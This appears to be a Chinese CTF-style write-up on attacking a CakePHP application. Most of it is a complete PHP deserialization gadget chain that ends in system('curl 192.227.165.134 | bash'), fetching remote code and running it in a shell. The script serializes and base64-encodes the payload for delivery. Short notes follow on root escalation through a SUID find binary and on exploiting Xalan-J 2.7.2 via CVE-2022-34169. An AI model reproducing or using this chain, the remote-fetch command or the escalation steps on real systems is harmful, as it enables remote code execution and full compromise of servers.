代码审计Cakephp项目
https://github.com/cakephp/cakephp
新挖一条通杀任意代码执行的链子就可以
<?php
namespace PHPUnit\\Framework\\MockObject\\Generator;
use function call_user_func;
use function class_exists;
use PHPUnit\\Framework\\MockObject\\ConfigurableMethod;
final class MockClass
{
private string $mockName="J1rrY";
private string $classCode="system('curl 192.227.165.134 | bash');";
}
namespace JsonSchema\\Iterator;
class ObjectIterator
{
}
namespace Cake\\Collection\\Iterator;
use Cake\\Collection\\Collection;
use Cake\\Collection\\CollectionInterface;
use Cake\\Collection\\CollectionTrait;
use JsonSchema\\Iterator\\ObjectIterator;
use MultipleIterator;
class ZipIterator
{
protected MultipleIterator $multipleIterator;
public function __construct()
{
$this->multipleIterator=new ObjectIterator();
}
}
namespace Cake\\Command;
use Cake\\Console\\Arguments;
use Cake\\Console\\ConsoleIo;
use Cake\\Console\\ConsoleOptionParser;
use Cake\\Core\\Configure;
use function Cake\\Core\\env;
class ServerCommand
{
}
namespace PHPUnit\\Framework\\MockObject\\Stub;
use function call_user_func_array;
use PHPUnit\\Framework\\MockObject\\Invocation;
final class ReturnCallback
{
}
namespace Cake\\ORM;
use BadMethodCallException;
use Cake\\Collection\\Iterator\\ZipIterator;
use Cake\\Command\\ServerCommand;
use Cake\\Core\\App;
use Cake\\Core\\ObjectRegistry;
use Cake\\Event\\EventDispatcherInterface;
use Cake\\Event\\EventDispatcherTrait;
use Cake\\ORM\\Exception\\MissingBehaviorException;
use Cake\\ORM\\Query\\SelectQuery;
use LogicException;
use PHPUnit\\Framework\\MockObject\\Generator\\MockClass;
use PHPUnit\\Framework\\MockObject\\Stub\\ReturnCallback;
class BehaviorRegistry
{
protected array $_methodMap = [];
protected array $_loaded = [];
public function __construct()
{
$this->_methodMap=["getname"=>["_","generate"]];
$this->_loaded=["_"=>new MockClass()];
}
}
namespace Cake\\ORM;
use ArrayObject;
use Cake\\Collection\\CollectionInterface;
use Cake\\Core\\Configure;
use Cake\\Core\\Exception\\CakeException;
use Cake\\Database\\Connection;
use Cake\\Database\\Exception\\DatabaseException;
use Cake\\Database\\Expression\\QueryExpression;
use Cake\\Database\\Schema\\TableSchemaInterface;
use Cake\\Database\\TypeFactory;
use Cake\\Datasource\\ConnectionManager;
use Cake\\Datasource\\EntityInterface;
use Cake\\Datasource\\Exception\\InvalidPrimaryKeyException;
use Cake\\Datasource\\RepositoryInterface;
use Cake\\Datasource\\RulesAwareTrait;
use Cake\\Event\\EventListenerInterface;
use Cake\\Event\\EventManager;
use Cake\\ORM\\Association\\BelongsTo;
use Cake\\ORM\\Association\\BelongsToMany;
use Cake\\ORM\\Association\\HasMany;
use Cake\\ORM\\Association\\HasOne;
use Cake\\ORM\\Exception\\MissingEntityException;
use Cake\\ORM\\Exception\\PersistenceFailedException;
use Cake\\ORM\\Exception\\RolledbackTransactionException;
use Cake\\ORM\\Query\\DeleteQuery;
use Cake\\ORM\\Query\\InsertQuery;
use Cake\\ORM\\Query\\QueryFactory;
use Cake\\ORM\\Query\\UpdateQuery;
use Cake\\ORM\\Rule\\IsUnique;
use Cake\\Utility\\Inflector;
use Cake\\Validation\\ValidatorAwareInterface;
use Cake\\Validation\\ValidatorAwareTrait;
use Closure;
use Exception;
use InvalidArgumentException;
use Psr\\SimpleCache\\CacheInterface;
use ReflectionFunction;
use ReflectionNamedType;
use function Cake\\Core\\deprecationWarning;
use function Cake\\Core\\namespaceSplit;
class Table
{
protected BehaviorRegistry $_behaviors;
public function __construct()
{
$this->_behaviors=new BehaviorRegistry();
}
}
namespace Cake\\Http\\Cookie;
use ArrayIterator;
use Cake\\ORM\\Table;
use Countable;
use DateTimeImmutable;
use DateTimeZone;
use Detection\\MobileDetect;
use Exception;
use InvalidArgumentException;
use IteratorAggregate;
use Psr\\Http\\Message\\RequestInterface;
use Psr\\Http\\Message\\ResponseInterface;
use Psr\\Http\\Message\\ServerRequestInterface;
use Traversable;
use TypeError;
use function Cake\\Core\\triggerWarning;
class CookieCollection
{
protected array $cookies = [];
public function __construct()
{
$this->cookies=[new Table()];
}
}
namespace Composer\\DependencyResolver;
use Cake\\Http\\Cookie\\CookieCollection;
use Composer\\Package\\BasePackage;
use Composer\\Package\\Version\\VersionParser;
use Composer\\Semver\\CompilingMatcher;
use Composer\\Semver\\Constraint\\ConstraintInterface;
use Composer\\Semver\\Constraint\\Constraint;
class Pool
{
protected $packages = [];
public function __construct()
{
$this->packages=[new CookieCollection()];
}
}
namespace React\\Promise\\Internal;
use Composer\\DependencyResolver\\Pool;
use React\\Promise\\PromiseInterface;
use function React\\Promise\\_checkTypehint;
use function React\\Promise\\resolve;
use function React\\Promise\\set_rejection_handler;
final class RejectedPromise
{
private $reason;
public function __construct()
{
$this->reason=new Pool();
}
}
//J1rrY
echo(base64_encode(serialize(new RejectedPromise())));
弹上去后有一个suid提权 直接find命令提权即可
注意是xalan 依赖 版本是 2.7.2 存在历史漏洞
Java 版本1.8.0.192
找到这个CVE,找项目直接打
https://alter1125.github.io/2023/02/19/Xalan-J XSLT整数截断漏洞利用构造(CVE-2022-34169)学习与扩展/#CheckList
但是直接打报错null,找到问题了,黑名单之后的问题在于他把我们传入的文件名进行了修改为null4位,但是项目给出的生成的文件都是6位的,
select -> abcdef.class 文件(文件内容发生变动则不用)Xalan-J XSLT整数截断漏洞利用构造(CVE-2022-34169)
直接用这个师傅的github项目就能打,注意获取文件名设定为6位,filename是参数获取单独传参